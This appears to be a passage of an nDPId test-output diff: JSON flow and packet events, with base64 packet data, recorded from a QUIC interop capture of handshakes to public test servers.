{"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01022{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":50705,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1603816434722,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":109,"pkt_l4_len":55,"thread_ts_msec":1603816434722,"pkt":"PKn0qB\/spJGxgjQ5ht1gDhB1ADcRMiYEqIAIAAChAAAAABJ5MAEgAQsHCsnVrqTT\/kdpHoB9EVHHYAA38EDMAAAAAAAIJzYQ4GSWjENRMDQzUTA0NlEwNTD\/AAAb\/wAAHP8AAB3\/AAAe\/wAAHw=="} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1603816434725,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":113,"pkt_l4_len":59,"thread_ts_msec":1603816434725,"pkt":"PKn0qB\/spJGxgjQ5ht1gBLlEADsRMSYAHxgjENIwUQN9nn11N08gAQsHCsnVrqTT\/kdpHoB9EVLLcAA7grWbAAAAAAAI85\/7s6OU42n\/AAAg\/wAAH\/8AAB3\/AAAe\/wAAHP8AABtQQ1ExUENRMMoKiqo="} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":41857,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1603816434729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434729,"pkt":"pJGxgjQ5PKn0qB\/sht1gD9VeBNgRQCABCwcKydWupNP+R2kegH0mBkcAABAAAAAAAABoFggmo4ERUgTYcSTECgoKCghziEmCXfFrHwAARL4b9YC0jUsti7Mc5rxL4bMvXbxsMAL4olVYvjN5PRilW7n4ljBBgiUUpEp6wkwiK5RNAL1DfWrRUra5EMQLYa7yT41ymm1v6KJQRwEqyPeHRFsdBUytKI1rPpS2iH3d+FCzh5\/N6Z35TAJ9TEkCWIk+Ml+SIXBhvhzUmKrkh5gS1558X7aUVr0+OVPR\/OBAJI6M04pwjG\/TaX02ASBnVhuctq1ZReIF0Qlkld94+mqjWxQYB1h\/dpYajowgC\/v5jRQEyHEsjdqTOCfqW28oG8epcCImwCaKkDGkjO6jIwTlSxF6latNrZSmdZRrSDZoCq8uakGSkhQeQD2tbSdbJP3NIbv48WygGXsPWffl9u2ujdRJm\/mhRyLkJCjx5sa5rgRArGikWOTIFjBiZskkStgxHsaKre0OnrY1wLFpG4jthscTHZBq1DL09xjZXEQJ2ar4Dtzgafat7TI9Hfak0NczSvcPxpb3sdfCJrdFt1LLq8mrHti29tt00qMRqTnKUeIkHYHh7EQQ9oqrrtJifM5cuHsdjGPMVxm9ZUD0068DuR7m1j4gZFuCYXIep1D1iLrNXyk77C1SoyXKdL1MFZ598bVXG059RuwlXJhTx+IppuQLvyCWcvMiIipe3POlLLXybFowBGtm+37kvSW6bP+6Bxu21k5BVUZfDmEKQyiqLWLjwhxn3jDb4fTI\/tsSGhcc\/41ZbDNffoTAgxCap8FDnwN9k1QY743o2ZLez7kXEqmuCSqROQE0HUjKczuKGz33rl5rbKMOlfIb\/lA8U1oeAS0Sj3wgBhRgs1SQYzWkBHGDyVcO7BJnrphu3U5D+htX5HpNK\/0e0TAN25zjT+K8nEX\/3DxvwlbRk5wJn+AyZ6JzbbsH\/1G362DzBVBwHYtagkCvON+t57Hc8iE0aTENenXMtwoN6f1B1wYZduiqdYZPniBsQbp7yIJXGHSGCsbl9vCCVYSK6B4mOBmSs59Zd9Zrb7yQCHCnL46xUUYWuW9XHIcs0q\/XTN95d+nDWCaFZa+65E1OkZ2fioJ1I0J\/kglR5x\/pGBhYlVfLXHAZVrrS3NBUMxiwiuXE9YBgC9AX1K\/KCo5PwZac3eUtWl9Wvsqatscy6Zn2neT5yibaTDkcAz+i\/SD6bPG3oO+HswnP0fQu\/hQQV52AAn588lzkI6wOW1Nf2SkEsrPhNqIqbOT+45N1cYw4dXaKydqgziAJcH6frtCv\/BERLWdW5ewDhAVbqZlXbOJGS3oeEiYxUgAGq5frf4Jy9sSj6pAt8NpKzgi1DQyQw+BwQnHXZRD\/HBVXw3jtQ1qbfGSm14e62NKcGoZWqPZ0CTo3qMtWuIR5HUMC7Ai6bto6NZQHe4oCIJdkAxQy1eEp0C4LTqq2dwEQGt8jSA+u5zN3lFYX3qO0vvZJcB6Zk0gu35QWPxA2cbDcDeaDguvChaUcmmEJupLYmfRogah2a2iBSw05H7VN+qBky0gky1JC8ev3mlnS6NoFiCW1OUv+s0O3xZXA3kkBnLnMiQ5jYF91oGnVVU63IlOma6Ux58+jDHxiAI7Pk+X2pAFVXwS81L08kdqsBZcYLq9UHGw9rxSOOIc+iP4xlUuEXJrJ2xk2YuBRoQ=="} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":41857,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":41857,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00636{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":56073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1603816434729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434729,"pkt":"pJGxgjQ5PKn0qB\/sht1gCGnqBNgRQCABCwcKydWupNP+R2kegH0mBKiACAAAoQAAAAASeTAB2wkBuwTYmHTJCgoKCggVxSlYpn4UkgAARL5ZLsODdf27vLuu6GHs9eSXiVxIAlfs7TcHZcazXn4JE3\/P5JDqe+tOVWQWmWJiN1Zi+QMXxBMeLDuq2FFgXlL2mFN2Y0Hpqzt32q0IcYNEtodCx0cCDcymndGz22NucmhqDhsBTfQYSZ0TGfZ0Y1dj7OIdkztU4UKtQk0Knbx0pPfOb04IoU66JRugmLaY3NcS6\/YWs3i+G\/Z1NaiZhF7wHXHAr7RtRzKLb2gPHbqV9JkwnbYNdieDzqo6OGYxfFJAF9UdpTyC5RofrFHDOiAzzOkMjstRpfIx0da81MZNBFjRQx8VBZVl5cb5VmHHCRKqUJJ\/pimnlqr6\/rH78B0tJyJdMLcbA0k\/GEaMgb2r9k+khrfN+IYPTP9LEK9IyC61PSNuLM7lCBCfjRBxaONHiGk0HUucFiwpQMj72lTAGTUsQa8qFngN+9r0I8HgvmsmOXC4IyatQFicI6JIBY\/\/xLWv+tugw\/qAeO1niZ+nJFTAbwyvKydJ4CrRCQplld36lx1IDKeajrlxvSY4TO7ZlmYtBTR\/QIZQ1n0y7WxFPForSvTZ5LmkvmQy\/XOIdCHzDT+yu3OG+dlOa05oJSJ5squ1DJvlYS4iSqaRgDu8O1f9s7zQOTQDTlP6inO815rKmw1YpQze+QAPS9Ar8Eh6loMYvm597mpGIaaCjBGmRjM30Y3EWQUMoVmSMYlr+ndlJs0\/parg\/PrflXFNfkn\/Wllw4cvS+JLWNhoBBJwDWpM9YkqIgN6sP6Sf1ACXsEwIhZbB5T3Y+mzlz1fEroyxtSisqFOFlOCB2g0djczdb72gMhUvdB4kROfNLNOm8f4hG1ZnJraoSrQJwgrY+zsLAidSwY62GHtAM9fUNITWGPk7OLfW3OjEbL6sh7ywY+xM+yu0nYlxg0Z8ST6zlbK88Dw9rVrViSQ3Oke1RR\/RShjWSOBcuUxTcA\/eXi5dEcOdrVm6ZsDQ0chPleXisZB4yI9mZgj+jwkM4eFcO6OX8YpKRHpSZrb0SkaAHjgOICK+1d\/ehnzz7M0KNYGDy8XZ08SS3gXJzSNXZLonqI\/bweWJiS+9rlVrB5J5IwRHJDEVN2aAZJbdqAdmcFPCL7XDwYisg0GfcM\/dL5C5xxZS6hZbPHwzwJ6y7r6\/T+A0XWV92UuetwR0QSUywswmbazFGMC\/MBz94jyq\/TrHbvq8OgHad29+CNuQfDZZomN6lJoFhgu1iOIbRwea4vmYiVysTLFxxLhym6vQpFJXvihZGX2xoV1bucff9DyhT5\/Wm8sYVpYS8i2GcM3jWfruzg6rk0SVDY6hf8HFcXkvUJGnDN4KwlwULBiTr9COS06u3di2jUKJqL6FFXM1FtZVzdRf3O\/3GNXJ2HDuA4IlWQXWMcKwj7HbOKOWlf39BkQPYBB\/3CwqDH5TkC7Ny98BmDT6ZzxJIZcSDCUoAZ3M1Es1K7QjuPUiIJlOZZ8vmraAuL1z0zGli+qvbM5O\/6zJbeqSM2M0z0mrGA7v66IfdcHwb0k8mj2tM2aIyHApEXwJPFbWKxWcFb4yW1jdVDOO0dDpGwpl3Ci5EerREPl9RIKJcKdoNqRq0LiqreYf6EOoxrVqsnRGXi8dK3qw4eUScQ=="} -00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":56073,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":56073,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434736,"flow_last_seen":1603816434736,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434736,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":43645,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1603816434736,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434736,"pkt":"pJGxgjQ5PKn0qB\/sht1gDJNoBNgRQCABCwcKydWupNP+R2kegH0gARnwAAQANAAAAAAAAAABqn0BuwTYttHMCgoKCgiHmjxz9S5+NQAARL60MndZKQNzXHuWbuWII8yYjx1QNcGEa3n\/tA\/kZwZdo0+NMbEhrCvw4fqUesktNwPhDHylUS4gcbEvHHb8Knr61qY95Pm5VKwq10YKtyHKrPUvOt6FFf4EaXlhbjCjP5PNGMuBPWvET6CR\/DNJ3amwoZ8AEiUkCCce2IA0+qLjflDvOu19oZVQSJhyk0ID2QUVFxDX+RIo\/BCEiyqGwrxxtUHNgSlpQhvXLPkd7gs0O8q\/1O3MXjjXw3VV1HTEIvgh9CIZHImqbItBAkHFYhj85297ojhzntlLLEMQUeWyYcLZaQRQLAnNxNHIfLFBwCs6Cttccxk8XUgObPlTQVTnnGvEYXJadvbFnkb5nj0E7bmqr23E\/kns4IXbYRFlEjJZfAc6UWDdSOXBoZHXMIAY\/dztkylxbqayCWGkn8v3wQJvR2xFoTyKE+Pp5saXn2uSt4EYi00Uf6fCGbypDRgDr6HED25efO5iFC99NJvuET7V90ObiIxoji+jOYwIL0BCHSm+uFeO8i7r3GmYR0Qg2iAiX6ZmlOl5gmCd40kAXe9Lo\/pKr3+r853YnPdtRNoIckFL+PsGubjlWj714eDNDRnoSoHs8UNwnNN8sF12pzQsAVr7qLBt4e8KWXFMXfkfIKWSnJhvivGIVrhMeN4RiaQ\/jippacCl0CUjlR9AUDC7DyDOswJ0+eP9X+z1Kkt7EaP13RXwGDeKbPLk\/tVc3ZXQShkobo74qelkPT7nbFmTZB78n2grmfmy0C6HMQ+qUHKH\/MfqCCK2ZnmHVM8veaHwzWHFJ4gVd2h5wLXlBRQqCB2AZzoyKpcMZFNpfGh+rTCIwQTyVZzycWPvtrbHzPNg+tUe1i\/foBt0+XApuoCCwHOsgf9nS7IFS3h97hfCh2TYTKBM6t9C3VPFYDuKYfUjriuP3G2Eq7sMAiqBDef1fYGxLN\/Dys1ZS2B2n+Zqt6K1diQtrzsIwKlRRg+XjfSSzPOVrKeXYenyNePWIMOs4YVAyvkFPV4RM\/osDQvZvShUA0iRuuMPCsj024c7WYx9lDihj4EJBymWsIkTQg0x6rfvVrFojeVlS8zgiytvfAIJsOr+k34t3NbLaK0YyfFcVKBnFDiEC5OcAMd0yi6ouvtE9rJyb\/CiH+Vtx9OSGkbowLLyCHtZ1EUgA0\/vr\/mU+ea4hE\/dLdDDjWwxrJg1oKjnYeHQvIDUT0MVaXTlMXS7\/F6HA7\/5QTayU5MU3hKtpwhACAx5gHHhue3iTscqXigKQ7oiaLOdxRIJ2wKmzNzvQPCG5UmOLnsbM\/3lI+SzzLjMM5HxKsnb7yJmS6z2+tdEoxPOa5ZNm7Wc1LoGgLZd+x+V88MeQDFaBDMQHNWCS8z7Ruv7Q8Jc\/JKShee1avRiWD+QjKfpjPULJzGhq8IhO+3xUZoq\/xSnX5PQ7xqYQY3oim9xsL+ADJPPe0oE2O\/lbNfbGhouInwUUVqUmdk\/fion2o\/ylxCHaGoB6j8tJgJq8ystdV8ErJCcEhkKohD7qeUu1YL\/exHAdFqCo5yGAJyVZFmJD6CkMOCvG195MdsDa2WfPCN+fs1Twy5bRnpAdq\/aOqOWkb9sVtpRcByoK+nPaUgcYcmBQw=="} -00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434736,"flow_last_seen":1603816434736,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434736,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":43645,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434736,"flow_last_seen":1603816434736,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434736,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":43645,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1603816434738,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434738,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA8ydAAEARtHzAqAGAwb4KYucjEVEE7P8dwwoKCgoIOPxKwZ+D2JAAAETSb9UlQE89ABeQeI\/QpsT81kvbf+yGJkDFJiGPzWvy81KCH2cJiDSPisJ1QnX5xtmzBkvUHRp2FuQGYa\/pilZqNP70VReX07WlD\/pZQJVCbigdcxMaEYZASHVRfutuRBKJAqHBAwLkNLD3Z3I0ZaHCqcS9KYzw98tkCokzq6mDpHzHtf6ExbYo4N0cIacCNvdP+KsCtrUQL5WlJ9CyKBD242cIc5CKdLYQTld3qevU3UaqfhVdl5eNkntpOfIkomDk06sEpzJqxU7qHCvJeRN5m5L79zL+gTeIyE9Asm2jjoxtsNgfImDjEtUQxGhWbcpzrh3DpfCal+\/Lh3\/9pzSQhk5oc7WisaXX4PMLYNl+D\/m52ZU0UFUhE0+l9n3VSr0dkOaUEe35MHeuokXZgwXZNMBFC5igXXlE8UTLsi0ue8JTTCNLCTt+A2z1dpM8DEqH3biH+qPKj7JaqT0dHO+FKOdg2AM+f4RwN8QCF26RT62FuMBNmyc7aD4PDQPxUCYmRi0UGMYomOoMy8hZ\/jdhA0wX+8Om3VVga0TGy7NSDrerhKL7+YEsof035rdtPH0Y3j599QoVaO64ZA3v+T3u\/PfqnGSNilFgI9flDp09Oakd9oM2lrpaAWLKUI\/yiWEn06khwuxYpdaA+jHlJRUxbcAtBcEA7Cj1DsLuovsIWklWe2vDb5Co0vAUw5gsM+5gFIyui6IYAnMYEgYAo0c5k8aJzc1BMlQVQ3DaV0O66JJgt45uH5jizP8oxu2Wh52E9LT2KVQJhcHClILWv+P8RGxhrIU6t17U1LVUVBWrmKV60at1NW+rS5XSlF37anegq12p4\/NuoM\/YA2qu2AGPkJxiKmaQkbUvxD27zSetz4qW8RHM7iubRGqfzIBqjSpWnrxid4CaaVVEodx37MBRM60oKdEd8diMaexoLpCHpXy9\/9K2ILLllW9BNa9VJqdBFl\/PG2+3KXrSPTzMih\/0LgFxzrGSKn0cLTERd6NQOkq4kYFwu05o3XKSFMJCrrKttzDQOD0Xxkg+EwHHOHzZmUPRCHUL9xhPxEJdnU1P\/3DLDZMnviROzqkxPMEGYvrPbBWkCovwDH0\/6kXKJUwTNn4cbIQkW\/t2p9CS7lBLRdj+DcuKY4rzac0WcEfT58KRBSZN+EEOJ8ox4ywybHsEVQIhRgiC6M8tZ0Xtu+jwmRkD7RXtD4ivQRzZZrdRaM7+tfWpzYQViq1cUl0HobKvf8BQLMQNaUHuCe2x0spprn6wrhwmhtFLZM\/3JUQaheNThydzrhRsBxsueLLPS2wSHRf5YbXUOfqKT8x1ZUxl1Cu9Q2MBtIfuiHdJowbL58DK14UHd5YMvnZi5fDRxVUztKDIVYQMqMKH8yV9xD3VGPyIiH8IGHHs5mHayhzBKpOTDNSJvoWCwUSiT09RuRXMK392nYlXWcB1GHTIFJkC8XToE5ImQ07hzYbIBq2ramFYEZ541ak4WuKuC31\/KEs2j8jC9NQ9YUqFgEBERIZrXwnuyNqHXFfcqkiJHQ96OMVEUoO+dD1RwDoPZlAiSL6Y0xKWblqIJeilsDd4MRdVKt2kHPj3frisO3sEnc1o4dW8rgPCUUWuyR+3XiwvLjWNq9104NxX8nzAm\/FnVOMJuAoC5Q=="} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":48644,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1603816434743,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434743,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAbxtAAEARaETAqAGAg58Yxr4EEVIE7BzKwgoKCgoIBzLrVZ9ibJ4AAETSpSIYhDhoiEFvP1qBCfMoU\/4qjpQbb9U7jdmFrc8viSpjQA7eDSIQICGT\/pnAELg3vnpeBC5hTrSAg5y0v3Nvj85YCDRYDUNtZg\/gqc9lMinrr2qy\/+tACJsh9TULiMkhVXBS\/DnqCBfVla2xKSlWGVYDfxfjWPLOnhjK4tuRvdsBg38QhZovgQwbE74gpeM+C0l1yFZQr\/3HZtCstNCtOu3UtW84W17PI7FfcdTn2s7KMsKWIseHKaKkB14DaKKUlr8b+M0Keb3aJipD33LW0ttcYvVI7edW5O9HmyMTEHHmLBoOENtgq1qxmaA8dcVwULmdz7v7A89bnJ9YPWVoQT\/AY3vPa9CPc7aXzzjpQHzXvLmR1Cp8lyfevJQBBugOzD1EFG+6ORqgxwy\/t3AMVq6UiTAqOHk10YiYfoOWp0mc0l792MEYihPH4U0Q4J\/xWCQfYBLc2RwO5JS8\/rBGN\/OkQMwq3X5t9nFOjPPZBRc\/+vV3l78KFWTME722BMgiyt1PB0IMcr\/wY9oB71n3944uqDUTQxh283ZrXbfA6w8v7iNeB1nvtIkfZTo5\/9dY9NpiV9qF4AHCmIy\/ojTRgA9UIdX8hEx5O0FmtvynQ+mLeozICBFeXAnpoY8U5dl0a8wlaBpakWQutMPrk\/nAriiy1jFsR5LnosEI4Yz6\/MFOg7bYZIyHPK\/xf+9zlkY7T4qEj6ycOajZ1TYCeHMIlwhBWcOIPbgRWdOWETBlCd6sWgfOMwJCAXcjFu88KLuQ+pCjd31kktdw1RVYXCTbQod3cSDHFSoD6z7zQZ32UQ\/kR6M7QstvWKuGXKrevWSqUPnQ7HrYNQDFIBkklqFkxbVZcSnT4UUB7KQmwYtQUc3FO7o6Sx9BRuD68Yg\/gcvk3BApsJtzmbS7xsNHmaRwAqrqaj4+m2ULPGLQS80yS6mffzxUsj35+UHRRyp7PYmh1cC9qTzCEsRA7CjRwHLjqXJ\/bFB2ydqN23sLpT9nS4qU4QS\/HV6Wwrx0WtQFBbsfAW3fUZkAAZCl13hpQUwFlYp1jVMEWAMYBq5YiQtqre2ANV2GA425sm0cmnAEo